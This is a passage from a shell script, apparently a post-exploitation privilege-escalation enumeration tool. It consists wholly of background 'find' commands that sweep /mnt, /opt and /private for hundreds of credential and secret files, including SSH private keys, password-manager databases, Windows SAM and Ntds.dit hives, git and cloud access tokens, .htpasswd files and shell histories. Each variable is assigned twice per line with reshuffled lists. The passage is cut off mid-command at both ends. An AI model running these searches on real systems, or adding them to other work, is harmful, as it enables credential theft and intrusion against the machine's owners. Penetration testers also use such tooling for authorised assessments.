\"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_MNT=`eval_bckgrd "find /mnt -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_MNT=`eval_bckgrd "find /mnt -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_OPT=`eval_bckgrd "find /opt -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_OPT=`eval_bckgrd "find /opt -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_PRIVATE=`eval_bckgrd "find /private -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_PRIVATE=`eval_bckgrd "find /private -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"agent*\" -o -name \"sysprep.xml\" -o -name 